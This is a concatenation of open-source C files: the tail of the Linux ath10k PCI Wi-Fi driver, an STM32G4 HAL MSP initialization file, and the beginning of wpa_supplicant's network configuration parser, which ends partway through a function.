ath10k_ce_priv(ar); int ret; spin_lock_init(&ce->ce_lock); spin_lock_init(&ar_pci->ps_lock); mutex_init(&ar_pci->ce_diag_mutex); INIT_WORK(&ar_pci->dump_work, ath10k_pci_fw_dump_work); timer_setup(&ar_pci->rx_post_retry, ath10k_pci_rx_replenish_retry, 0); if (QCA_REV_6174(ar) || QCA_REV_9377(ar)) ath10k_pci_override_ce_config(ar); ret = ath10k_pci_alloc_pipes(ar); if (ret) { ath10k_err(ar, "failed to allocate copy engine pipes: %d\n", ret); return ret; } return 0; } void ath10k_pci_release_resource(struct ath10k *ar) { ath10k_pci_rx_retry_sync(ar); netif_napi_del(&ar->napi); ath10k_pci_ce_deinit(ar); ath10k_pci_free_pipes(ar); } static const struct ath10k_bus_ops ath10k_pci_bus_ops = { .read32 = ath10k_bus_pci_read32, .write32 = ath10k_bus_pci_write32, .get_num_banks = ath10k_pci_get_num_banks, }; static int ath10k_pci_probe(struct pci_dev *pdev, const struct pci_device_id *pci_dev) { int ret = 0; struct ath10k *ar; struct ath10k_pci *ar_pci; enum ath10k_hw_rev hw_rev; struct ath10k_bus_params bus_params = {}; bool pci_ps, is_qca988x = false; int (*pci_soft_reset)(struct ath10k *ar); int (*pci_hard_reset)(struct ath10k *ar); u32 (*targ_cpu_to_ce_addr)(struct ath10k *ar, u32 addr); switch (pci_dev->device) { case QCA988X_2_0_DEVICE_ID_UBNT: case QCA988X_2_0_DEVICE_ID: hw_rev = ATH10K_HW_QCA988X; pci_ps = false; is_qca988x = true; pci_soft_reset = ath10k_pci_warm_reset; pci_hard_reset = ath10k_pci_qca988x_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca988x_targ_cpu_to_ce_addr; break; case QCA9887_1_0_DEVICE_ID: hw_rev = ATH10K_HW_QCA9887; pci_ps = false; pci_soft_reset = ath10k_pci_warm_reset; pci_hard_reset = ath10k_pci_qca988x_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca988x_targ_cpu_to_ce_addr; break; case QCA6164_2_1_DEVICE_ID: case QCA6174_2_1_DEVICE_ID: hw_rev = ATH10K_HW_QCA6174; pci_ps = true; pci_soft_reset = ath10k_pci_warm_reset; pci_hard_reset = ath10k_pci_qca6174_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca6174_targ_cpu_to_ce_addr; break; case QCA99X0_2_0_DEVICE_ID: hw_rev = ATH10K_HW_QCA99X0; pci_ps = false; pci_soft_reset = ath10k_pci_qca99x0_soft_chip_reset; pci_hard_reset = ath10k_pci_qca99x0_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca99x0_targ_cpu_to_ce_addr; break; case QCA9984_1_0_DEVICE_ID: hw_rev = ATH10K_HW_QCA9984; pci_ps = false; pci_soft_reset = ath10k_pci_qca99x0_soft_chip_reset; pci_hard_reset = ath10k_pci_qca99x0_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca99x0_targ_cpu_to_ce_addr; break; case QCA9888_2_0_DEVICE_ID: hw_rev = ATH10K_HW_QCA9888; pci_ps = false; pci_soft_reset = ath10k_pci_qca99x0_soft_chip_reset; pci_hard_reset = ath10k_pci_qca99x0_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca99x0_targ_cpu_to_ce_addr; break; case QCA9377_1_0_DEVICE_ID: hw_rev = ATH10K_HW_QCA9377; pci_ps = true; pci_soft_reset = ath10k_pci_warm_reset; pci_hard_reset = ath10k_pci_qca6174_chip_reset; targ_cpu_to_ce_addr = ath10k_pci_qca6174_targ_cpu_to_ce_addr; break; default: WARN_ON(1); return -ENOTSUPP; } ar = ath10k_core_create(sizeof(*ar_pci), &pdev->dev, ATH10K_BUS_PCI, hw_rev, &ath10k_pci_hif_ops); if (!ar) { dev_err(&pdev->dev, "failed to allocate core\n"); return -ENOMEM; } ath10k_dbg(ar, ATH10K_DBG_BOOT, "pci probe %04x:%04x %04x:%04x\n", pdev->vendor, pdev->device, pdev->subsystem_vendor, pdev->subsystem_device); ar_pci = ath10k_pci_priv(ar); ar_pci->pdev = pdev; ar_pci->dev = &pdev->dev; ar_pci->ar = ar; ar->dev_id = pci_dev->device; ar_pci->pci_ps = pci_ps; ar_pci->ce.bus_ops = &ath10k_pci_bus_ops; ar_pci->pci_soft_reset = pci_soft_reset; ar_pci->pci_hard_reset = pci_hard_reset; ar_pci->targ_cpu_to_ce_addr = targ_cpu_to_ce_addr; ar->ce_priv = &ar_pci->ce; ar->id.vendor = pdev->vendor; ar->id.device = pdev->device; ar->id.subsystem_vendor = pdev->subsystem_vendor; ar->id.subsystem_device = pdev->subsystem_device; timer_setup(&ar_pci->ps_timer, ath10k_pci_ps_timer, 0); ret = ath10k_pci_setup_resource(ar); if (ret) { ath10k_err(ar, "failed to setup resource: %d\n", ret); goto err_core_destroy; } ret = ath10k_pci_claim(ar); if (ret) { ath10k_err(ar, "failed to claim device: %d\n", ret); goto err_free_pipes; } ret = ath10k_pci_force_wake(ar); if (ret) { ath10k_warn(ar, "failed to wake up device : %d\n", ret); goto err_sleep; } ath10k_pci_ce_deinit(ar); ath10k_pci_irq_disable(ar); ret = ath10k_pci_init_irq(ar); if (ret) { ath10k_err(ar, "failed to init irqs: %d\n", ret); goto err_sleep; } ath10k_info(ar, "pci irq %s oper_irq_mode %d irq_mode %d reset_mode %d\n", ath10k_pci_get_irq_method(ar), ar_pci->oper_irq_mode, ath10k_pci_irq_mode, ath10k_pci_reset_mode); ret = ath10k_pci_request_irq(ar); if (ret) { ath10k_warn(ar, "failed to request irqs: %d\n", ret); goto err_deinit_irq; } bus_params.dev_type = ATH10K_DEV_TYPE_LL; bus_params.link_can_suspend = true; /* Read CHIP_ID before reset to catch QCA9880-AR1A v1 devices that * fall off the bus during chip_reset. These chips have the same pci * device id as the QCA9880 BR4A or 2R4E. So that's why the check. */ if (is_qca988x) { bus_params.chip_id = ath10k_pci_soc_read32(ar, SOC_CHIP_ID_ADDRESS); if (bus_params.chip_id != 0xffffffff) { if (!ath10k_pci_chip_is_supported(pdev->device, bus_params.chip_id)) goto err_unsupported; } } ret = ath10k_pci_chip_reset(ar); if (ret) { ath10k_err(ar, "failed to reset chip: %d\n", ret); goto err_free_irq; } bus_params.chip_id = ath10k_pci_soc_read32(ar, SOC_CHIP_ID_ADDRESS); if (bus_params.chip_id == 0xffffffff) goto err_unsupported; if (!ath10k_pci_chip_is_supported(pdev->device, bus_params.chip_id)) goto err_free_irq; ret = ath10k_core_register(ar, &bus_params); if (ret) { ath10k_err(ar, "failed to register driver core: %d\n", ret); goto err_free_irq; } return 0; err_unsupported: ath10k_err(ar, "device %04x with chip_id %08x isn't supported\n", pdev->device, bus_params.chip_id); err_free_irq: ath10k_pci_free_irq(ar); ath10k_pci_rx_retry_sync(ar); err_deinit_irq: ath10k_pci_deinit_irq(ar); err_sleep: ath10k_pci_sleep_sync(ar); ath10k_pci_release(ar); err_free_pipes: ath10k_pci_free_pipes(ar); err_core_destroy: ath10k_core_destroy(ar); return ret; } static void ath10k_pci_remove(struct pci_dev *pdev) { struct ath10k *ar = pci_get_drvdata(pdev); struct ath10k_pci *ar_pci; ath10k_dbg(ar, ATH10K_DBG_PCI, "pci remove\n"); if (!ar) return; ar_pci = ath10k_pci_priv(ar); if (!ar_pci) return; ath10k_core_unregister(ar); ath10k_pci_free_irq(ar); ath10k_pci_deinit_irq(ar); ath10k_pci_release_resource(ar); ath10k_pci_sleep_sync(ar); ath10k_pci_release(ar); ath10k_core_destroy(ar); } MODULE_DEVICE_TABLE(pci, ath10k_pci_id_table); static __maybe_unused int ath10k_pci_pm_suspend(struct device *dev) { struct ath10k *ar = dev_get_drvdata(dev); int ret; ret = ath10k_pci_suspend(ar); if (ret) ath10k_warn(ar, "failed to suspend hif: %d\n", ret); return ret; } static __maybe_unused int ath10k_pci_pm_resume(struct device *dev) { struct ath10k *ar = dev_get_drvdata(dev); int ret; ret = ath10k_pci_resume(ar); if (ret) ath10k_warn(ar, "failed to resume hif: %d\n", ret); return ret; } static SIMPLE_DEV_PM_OPS(ath10k_pci_pm_ops, ath10k_pci_pm_suspend, ath10k_pci_pm_resume); static struct pci_driver ath10k_pci_driver = { .name = "ath10k_pci", .id_table = ath10k_pci_id_table, .probe = ath10k_pci_probe, .remove = ath10k_pci_remove, #ifdef CONFIG_PM .driver.pm = &ath10k_pci_pm_ops, #endif }; static int __init ath10k_pci_init(void) { int ret; ret = pci_register_driver(&ath10k_pci_driver); if (ret) printk(KERN_ERR "failed to register ath10k pci driver: %d\n", ret); ret = ath10k_ahb_init(); if (ret) printk(KERN_ERR "ahb init failed: %d\n", ret); return ret; } module_init(ath10k_pci_init); static void __exit ath10k_pci_exit(void) { pci_unregister_driver(&ath10k_pci_driver); ath10k_ahb_exit(); } module_exit(ath10k_pci_exit); MODULE_AUTHOR("Qualcomm Atheros"); MODULE_DESCRIPTION("Driver support for Qualcomm Atheros 802.11ac WLAN PCIe/AHB devices"); MODULE_LICENSE("Dual BSD/GPL"); /* QCA988x 2.0 firmware files */ MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" ATH10K_FW_API2_FILE); MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" ATH10K_FW_API3_FILE); MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" ATH10K_FW_API4_FILE); MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" ATH10K_FW_API5_FILE); MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" QCA988X_HW_2_0_BOARD_DATA_FILE); MODULE_FIRMWARE(QCA988X_HW_2_0_FW_DIR "/" ATH10K_BOARD_API2_FILE); /* QCA9887 1.0 firmware files */ MODULE_FIRMWARE(QCA9887_HW_1_0_FW_DIR "/" ATH10K_FW_API5_FILE); MODULE_FIRMWARE(QCA9887_HW_1_0_FW_DIR "/" QCA9887_HW_1_0_BOARD_DATA_FILE); MODULE_FIRMWARE(QCA9887_HW_1_0_FW_DIR "/" ATH10K_BOARD_API2_FILE); /* QCA6174 2.1 firmware files */ MODULE_FIRMWARE(QCA6174_HW_2_1_FW_DIR "/" ATH10K_FW_API4_FILE); MODULE_FIRMWARE(QCA6174_HW_2_1_FW_DIR "/" ATH10K_FW_API5_FILE); MODULE_FIRMWARE(QCA6174_HW_2_1_FW_DIR "/" QCA6174_HW_2_1_BOARD_DATA_FILE); MODULE_FIRMWARE(QCA6174_HW_2_1_FW_DIR "/" ATH10K_BOARD_API2_FILE); /* QCA6174 3.1 firmware files */ MODULE_FIRMWARE(QCA6174_HW_3_0_FW_DIR "/" ATH10K_FW_API4_FILE); MODULE_FIRMWARE(QCA6174_HW_3_0_FW_DIR "/" ATH10K_FW_API5_FILE); MODULE_FIRMWARE(QCA6174_HW_3_0_FW_DIR "/" ATH10K_FW_API6_FILE); MODULE_FIRMWARE(QCA6174_HW_3_0_FW_DIR "/" QCA6174_HW_3_0_BOARD_DATA_FILE); MODULE_FIRMWARE(QCA6174_HW_3_0_FW_DIR "/" ATH10K_BOARD_API2_FILE); /* QCA9377 1.0 firmware files */ MODULE_FIRMWARE(QCA9377_HW_1_0_FW_DIR "/" ATH10K_FW_API6_FILE); MODULE_FIRMWARE(QCA9377_HW_1_0_FW_DIR "/" ATH10K_FW_API5_FILE); MODULE_FIRMWARE(QCA9377_HW_1_0_FW_DIR "/" QCA9377_HW_1_0_BOARD_DATA_FILE);
254911.c
/* USER CODE BEGIN Header */ /** ****************************************************************************** * File Name : stm32g4xx_hal_msp.c * Description : This file provides code for the MSP Initialization * and de-Initialization codes. ****************************************************************************** * @attention * * <h2><center>&copy; Copyright (c) 2019 STMicroelectronics. * All rights reserved.</center></h2> * * This software component is licensed by ST under BSD 3-Clause license, * the "License"; You may not use this file except in compliance with the * License. You may obtain a copy of the License at: * opensource.org/licenses/BSD-3-Clause * ****************************************************************************** */ /* USER CODE END Header */ /* Includes ------------------------------------------------------------------*/ #include "main.h" /* USER CODE BEGIN Includes */ /* USER CODE END Includes */ /* Private typedef -----------------------------------------------------------*/ /* USER CODE BEGIN TD */ /* USER CODE END TD */ /* Private define ------------------------------------------------------------*/ /* USER CODE BEGIN Define */ /* USER CODE END Define */ /* Private macro -------------------------------------------------------------*/ /* USER CODE BEGIN Macro */ /* USER CODE END Macro */ /* Private variables ---------------------------------------------------------*/ /* USER CODE BEGIN PV */ /* USER CODE END PV */ /* Private function prototypes -----------------------------------------------*/ /* USER CODE BEGIN PFP */ /* USER CODE END PFP */ /* External functions --------------------------------------------------------*/ /* USER CODE BEGIN ExternalFunctions */ /* USER CODE END ExternalFunctions */ /* USER CODE BEGIN 0 */ /* USER CODE END 0 */ /** * Initializes the Global MSP. */ void HAL_MspInit(void) { /* USER CODE BEGIN MspInit 0 */ /* USER CODE END MspInit 0 */ __HAL_RCC_SYSCFG_CLK_ENABLE(); __HAL_RCC_PWR_CLK_ENABLE(); /* System interrupt init*/ /** Disable the internal Pull-Up in Dead Battery pins of UCPD peripheral */ LL_PWR_DisableDeadBatteryPD(); /* USER CODE BEGIN MspInit 1 */ /* USER CODE END MspInit 1 */ } /** * @brief TIM_Base MSP Initialization * This function configures the hardware resources used in this example * @param htim_base: TIM_Base handle pointer * @retval None */ void HAL_TIM_Base_MspInit(TIM_HandleTypeDef* htim_base) { if(htim_base->Instance==TIM2) { /* USER CODE BEGIN TIM2_MspInit 0 */ /* USER CODE END TIM2_MspInit 0 */ /* Peripheral clock enable */ __HAL_RCC_TIM2_CLK_ENABLE(); /* TIM2 interrupt Init */ HAL_NVIC_SetPriority(TIM2_IRQn, 0, 0); HAL_NVIC_EnableIRQ(TIM2_IRQn); /* USER CODE BEGIN TIM2_MspInit 1 */ /* USER CODE END TIM2_MspInit 1 */ } } /** * @brief TIM_Base MSP De-Initialization * This function freeze the hardware resources used in this example * @param htim_base: TIM_Base handle pointer * @retval None */ void HAL_TIM_Base_MspDeInit(TIM_HandleTypeDef* htim_base) { if(htim_base->Instance==TIM2) { /* USER CODE BEGIN TIM2_MspDeInit 0 */ /* USER CODE END TIM2_MspDeInit 0 */ /* Peripheral clock disable */ __HAL_RCC_TIM2_CLK_DISABLE(); /* TIM2 interrupt DeInit */ HAL_NVIC_DisableIRQ(TIM2_IRQn); /* USER CODE BEGIN TIM2_MspDeInit 1 */ /* USER CODE END TIM2_MspDeInit 1 */ } } /* USER CODE BEGIN 1 */ /* USER CODE END 1 */ /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
515096.c
/* * WPA Supplicant / Configuration parser and common functions * Copyright (c) 2003-2012, Jouni Malinen <j@w1.fi> * * This software may be distributed under the terms of the BSD license. * See README for more details. */ #include "includes.h" #include "common.h" #include "utils/uuid.h" #include "utils/ip_addr.h" #include "crypto/sha1.h" #include "rsn_supp/wpa.h" #include "eap_peer/eap.h" #include "p2p/p2p.h" #include "config.h" #if !defined(CONFIG_CTRL_IFACE) && defined(CONFIG_NO_CONFIG_WRITE) #define NO_CONFIG_WRITE #endif /* * Structure for network configuration parsing. This data is used to implement * a generic parser for each network block variable. The table of configuration * variables is defined below in this file (ssid_fields[]). */ struct parse_data { /* Configuration variable name */ char *name; /* Parser function for this variable */ int (*parser)(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value); #ifndef NO_CONFIG_WRITE /* Writer function (i.e., to get the variable in text format from * internal presentation). */ char * (*writer)(const struct parse_data *data, struct wpa_ssid *ssid); #endif /* NO_CONFIG_WRITE */ /* Variable specific parameters for the parser. */ void *param1, *param2, *param3, *param4; /* 0 = this variable can be included in debug output and ctrl_iface * 1 = this variable contains key/private data and it must not be * included in debug output unless explicitly requested. In * addition, this variable will not be readable through the * ctrl_iface. */ int key_data; }; static int wpa_config_parse_str(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { size_t res_len, *dst_len; char **dst, *tmp; if (os_strcmp(value, "NULL") == 0) { wpa_printf(MSG_DEBUG, "Unset configuration string '%s'", data->name); tmp = NULL; res_len = 0; goto set; } tmp = wpa_config_parse_string(value, &res_len); if (tmp == NULL) { wpa_printf(MSG_ERROR, "Line %d: failed to parse %s '%s'.", line, data->name, data->key_data ? "[KEY DATA REMOVED]" : value); return -1; } if (data->key_data) { wpa_hexdump_ascii_key(MSG_MSGDUMP, data->name, (u8 *) tmp, res_len); } else { wpa_hexdump_ascii(MSG_MSGDUMP, data->name, (u8 *) tmp, res_len); } if (data->param3 && res_len < (size_t) data->param3) { wpa_printf(MSG_ERROR, "Line %d: too short %s (len=%lu " "min_len=%ld)", line, data->name, (unsigned long) res_len, (long) data->param3); os_free(tmp); return -1; } if (data->param4 && res_len > (size_t) data->param4) { wpa_printf(MSG_ERROR, "Line %d: too long %s (len=%lu " "max_len=%ld)", line, data->name, (unsigned long) res_len, (long) data->param4); os_free(tmp); return -1; } set: dst = (char **) (((u8 *) ssid) + (long) data->param1); dst_len = (size_t *) (((u8 *) ssid) + (long) data->param2); os_free(*dst); *dst = tmp; if (data->param2) *dst_len = res_len; return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_string_ascii(const u8 *value, size_t len) { char *buf; buf = os_malloc(len + 3); if (buf == NULL) return NULL; buf[0] = '"'; os_memcpy(buf + 1, value, len); buf[len + 1] = '"'; buf[len + 2] = '\0'; return buf; } static char * wpa_config_write_string_hex(const u8 *value, size_t len) { char *buf; buf = os_zalloc(2 * len + 1); if (buf == NULL) return NULL; wpa_snprintf_hex(buf, 2 * len + 1, value, len); return buf; } static char * wpa_config_write_string(const u8 *value, size_t len) { if (value == NULL) return NULL; if (is_hex(value, len)) return wpa_config_write_string_hex(value, len); else return wpa_config_write_string_ascii(value, len); } static char * wpa_config_write_str(const struct parse_data *data, struct wpa_ssid *ssid) { size_t len; char **src; src = (char **) (((u8 *) ssid) + (long) data->param1); if (*src == NULL) return NULL; if (data->param2) len = *((size_t *) (((u8 *) ssid) + (long) data->param2)); else len = os_strlen(*src); return wpa_config_write_string((const u8 *) *src, len); } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_int(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val, *dst; char *end; dst = (int *) (((u8 *) ssid) + (long) data->param1); val = strtol(value, &end, 0); if (*end) { wpa_printf(MSG_ERROR, "Line %d: invalid number \"%s\"", line, value); return -1; } *dst = val; wpa_printf(MSG_MSGDUMP, "%s=%d (0x%x)", data->name, *dst, *dst); if (data->param3 && *dst < (long) data->param3) { wpa_printf(MSG_ERROR, "Line %d: too small %s (value=%d " "min_value=%ld)", line, data->name, *dst, (long) data->param3); *dst = (long) data->param3; return -1; } if (data->param4 && *dst > (long) data->param4) { wpa_printf(MSG_ERROR, "Line %d: too large %s (value=%d " "max_value=%ld)", line, data->name, *dst, (long) data->param4); *dst = (long) data->param4; return -1; } return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_int(const struct parse_data *data, struct wpa_ssid *ssid) { int *src, res; char *value; src = (int *) (((u8 *) ssid) + (long) data->param1); value = os_malloc(20); if (value == NULL) return NULL; res = os_snprintf(value, 20, "%d", *src); if (res < 0 || res >= 20) { os_free(value); return NULL; } value[20 - 1] = '\0'; return value; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_bssid(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { if (value[0] == '\0' || os_strcmp(value, "\"\"") == 0 || os_strcmp(value, "any") == 0) { ssid->bssid_set = 0; wpa_printf(MSG_MSGDUMP, "BSSID any"); return 0; } if (hwaddr_aton(value, ssid->bssid)) { wpa_printf(MSG_ERROR, "Line %d: Invalid BSSID '%s'.", line, value); return -1; } ssid->bssid_set = 1; wpa_hexdump(MSG_MSGDUMP, "BSSID", ssid->bssid, ETH_ALEN); return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_bssid(const struct parse_data *data, struct wpa_ssid *ssid) { char *value; int res; if (!ssid->bssid_set) return NULL; value = os_malloc(20); if (value == NULL) return NULL; res = os_snprintf(value, 20, MACSTR, MAC2STR(ssid->bssid)); if (res < 0 || res >= 20) { os_free(value); return NULL; } value[20 - 1] = '\0'; return value; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_psk(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { #ifdef CONFIG_EXT_PASSWORD if (os_strncmp(value, "ext:", 4) == 0) { str_clear_free(ssid->passphrase); ssid->passphrase = NULL; ssid->psk_set = 0; os_free(ssid->ext_psk); ssid->ext_psk = os_strdup(value + 4); if (ssid->ext_psk == NULL) return -1; wpa_printf(MSG_DEBUG, "PSK: External password '%s'", ssid->ext_psk); return 0; } #endif /* CONFIG_EXT_PASSWORD */ if (*value == '"') { #ifndef CONFIG_NO_PBKDF2 const char *pos; size_t len; value++; pos = os_strrchr(value, '"'); if (pos) len = pos - value; else len = os_strlen(value); if (len < 8 || len > 63) { wpa_printf(MSG_ERROR, "Line %d: Invalid passphrase " "length %lu (expected: 8..63) '%s'.", line, (unsigned long) len, value); return -1; } wpa_hexdump_ascii_key(MSG_MSGDUMP, "PSK (ASCII passphrase)", (u8 *) value, len); if (ssid->passphrase && os_strlen(ssid->passphrase) == len && os_memcmp(ssid->passphrase, value, len) == 0) return 0; ssid->psk_set = 0; str_clear_free(ssid->passphrase); ssid->passphrase = dup_binstr(value, len); if (ssid->passphrase == NULL) return -1; return 0; #else /* CONFIG_NO_PBKDF2 */ wpa_printf(MSG_ERROR, "Line %d: ASCII passphrase not " "supported.", line); return -1; #endif /* CONFIG_NO_PBKDF2 */ } if (hexstr2bin(value, ssid->psk, PMK_LEN) || value[PMK_LEN * 2] != '\0') { wpa_printf(MSG_ERROR, "Line %d: Invalid PSK '%s'.", line, value); return -1; } str_clear_free(ssid->passphrase); ssid->passphrase = NULL; ssid->psk_set = 1; wpa_hexdump_key(MSG_MSGDUMP, "PSK", ssid->psk, PMK_LEN); return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_psk(const struct parse_data *data, struct wpa_ssid *ssid) { #ifdef CONFIG_EXT_PASSWORD if (ssid->ext_psk) { size_t len = 4 + os_strlen(ssid->ext_psk) + 1; char *buf = os_malloc(len); if (buf == NULL) return NULL; os_snprintf(buf, len, "ext:%s", ssid->ext_psk); return buf; } #endif /* CONFIG_EXT_PASSWORD */ if (ssid->passphrase) return wpa_config_write_string_ascii( (const u8 *) ssid->passphrase, os_strlen(ssid->passphrase)); if (ssid->psk_set) return wpa_config_write_string_hex(ssid->psk, PMK_LEN); return NULL; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_proto(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val = 0, last, errors = 0; char *start, *end, *buf; buf = os_strdup(value); if (buf == NULL) return -1; start = buf; while (*start != '\0') { while (*start == ' ' || *start == '\t') start++; if (*start == '\0') break; end = start; while (*end != ' ' && *end != '\t' && *end != '\0') end++; last = *end == '\0'; *end = '\0'; if (os_strcmp(start, "WPA") == 0) val |= WPA_PROTO_WPA; else if (os_strcmp(start, "RSN") == 0 || os_strcmp(start, "WPA2") == 0) val |= WPA_PROTO_RSN; else if (os_strcmp(start, "OSEN") == 0) val |= WPA_PROTO_OSEN; else { wpa_printf(MSG_ERROR, "Line %d: invalid proto '%s'", line, start); errors++; } if (last) break; start = end + 1; } os_free(buf); if (val == 0) { wpa_printf(MSG_ERROR, "Line %d: no proto values configured.", line); errors++; } wpa_printf(MSG_MSGDUMP, "proto: 0x%x", val); ssid->proto = val; return errors ? -1 : 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_proto(const struct parse_data *data, struct wpa_ssid *ssid) { int ret; char *buf, *pos, *end; pos = buf = os_zalloc(20); if (buf == NULL) return NULL; end = buf + 20; if (ssid->proto & WPA_PROTO_WPA) { ret = os_snprintf(pos, end - pos, "%sWPA", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } if (ssid->proto & WPA_PROTO_RSN) { ret = os_snprintf(pos, end - pos, "%sRSN", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } if (ssid->proto & WPA_PROTO_OSEN) { ret = os_snprintf(pos, end - pos, "%sOSEN", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) return buf; pos += ret; } if (pos == buf) { os_free(buf); buf = NULL; } return buf; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_key_mgmt(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { int val = 0, last, errors = 0; char *start, *end, *buf; buf = os_strdup(value); if (buf == NULL) return -1; start = buf; while (*start != '\0') { while (*start == ' ' || *start == '\t') start++; if (*start == '\0') break; end = start; while (*end != ' ' && *end != '\t' && *end != '\0') end++; last = *end == '\0'; *end = '\0'; if (os_strcmp(start, "WPA-PSK") == 0) val |= WPA_KEY_MGMT_PSK; else if (os_strcmp(start, "WPA-EAP") == 0) val |= WPA_KEY_MGMT_IEEE8021X; else if (os_strcmp(start, "IEEE8021X") == 0) val |= WPA_KEY_MGMT_IEEE8021X_NO_WPA; else if (os_strcmp(start, "NONE") == 0) val |= WPA_KEY_MGMT_NONE; else if (os_strcmp(start, "WPA-NONE") == 0) val |= WPA_KEY_MGMT_WPA_NONE; #ifdef CONFIG_IEEE80211R else if (os_strcmp(start, "FT-PSK") == 0) val |= WPA_KEY_MGMT_FT_PSK; else if (os_strcmp(start, "FT-EAP") == 0) val |= WPA_KEY_MGMT_FT_IEEE8021X; #endif /* CONFIG_IEEE80211R */ #ifdef CONFIG_IEEE80211W else if (os_strcmp(start, "WPA-PSK-SHA256") == 0) val |= WPA_KEY_MGMT_PSK_SHA256; else if (os_strcmp(start, "WPA-EAP-SHA256") == 0) val |= WPA_KEY_MGMT_IEEE8021X_SHA256; #endif /* CONFIG_IEEE80211W */ #ifdef CONFIG_WPS else if (os_strcmp(start, "WPS") == 0) val |= WPA_KEY_MGMT_WPS; #endif /* CONFIG_WPS */ #ifdef CONFIG_SAE else if (os_strcmp(start, "SAE") == 0) val |= WPA_KEY_MGMT_SAE; else if (os_strcmp(start, "FT-SAE") == 0) val |= WPA_KEY_MGMT_FT_SAE; #endif /* CONFIG_SAE */ #ifdef CONFIG_HS20 else if (os_strcmp(start, "OSEN") == 0) val |= WPA_KEY_MGMT_OSEN; #endif /* CONFIG_HS20 */ else { wpa_printf(MSG_ERROR, "Line %d: invalid key_mgmt '%s'", line, start); errors++; } if (last) break; start = end + 1; } os_free(buf); if (val == 0) { wpa_printf(MSG_ERROR, "Line %d: no key_mgmt values configured.", line); errors++; } wpa_printf(MSG_MSGDUMP, "key_mgmt: 0x%x", val); ssid->key_mgmt = val; return errors ? -1 : 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_key_mgmt(const struct parse_data *data, struct wpa_ssid *ssid) { char *buf, *pos, *end; int ret; pos = buf = os_zalloc(100); if (buf == NULL) return NULL; end = buf + 100; if (ssid->key_mgmt & WPA_KEY_MGMT_PSK) { ret = os_snprintf(pos, end - pos, "%sWPA-PSK", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_IEEE8021X) { ret = os_snprintf(pos, end - pos, "%sWPA-EAP", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_IEEE8021X_NO_WPA) { ret = os_snprintf(pos, end - pos, "%sIEEE8021X", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_NONE) { ret = os_snprintf(pos, end - pos, "%sNONE", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_WPA_NONE) { ret = os_snprintf(pos, end - pos, "%sWPA-NONE", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } #ifdef CONFIG_IEEE80211R if (ssid->key_mgmt & WPA_KEY_MGMT_FT_PSK) { ret = os_snprintf(pos, end - pos, "%sFT-PSK", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_FT_IEEE8021X) { ret = os_snprintf(pos, end - pos, "%sFT-EAP", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } #endif /* CONFIG_IEEE80211R */ #ifdef CONFIG_IEEE80211W if (ssid->key_mgmt & WPA_KEY_MGMT_PSK_SHA256) { ret = os_snprintf(pos, end - pos, "%sWPA-PSK-SHA256", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } if (ssid->key_mgmt & WPA_KEY_MGMT_IEEE8021X_SHA256) { ret = os_snprintf(pos, end - pos, "%sWPA-EAP-SHA256", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } #endif /* CONFIG_IEEE80211W */ #ifdef CONFIG_WPS if (ssid->key_mgmt & WPA_KEY_MGMT_WPS) { ret = os_snprintf(pos, end - pos, "%sWPS", pos == buf ? "" : " "); if (ret < 0 || ret >= end - pos) { end[-1] = '\0'; return buf; } pos += ret; } #endif /* CONFIG_WPS */ if (pos == buf) { os_free(buf); buf = NULL; } return buf; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_cipher(int line, const char *value) { int val = wpa_parse_cipher(value); if (val < 0) { wpa_printf(MSG_ERROR, "Line %d: invalid cipher '%s'.", line, value); return -1; } if (val == 0) { 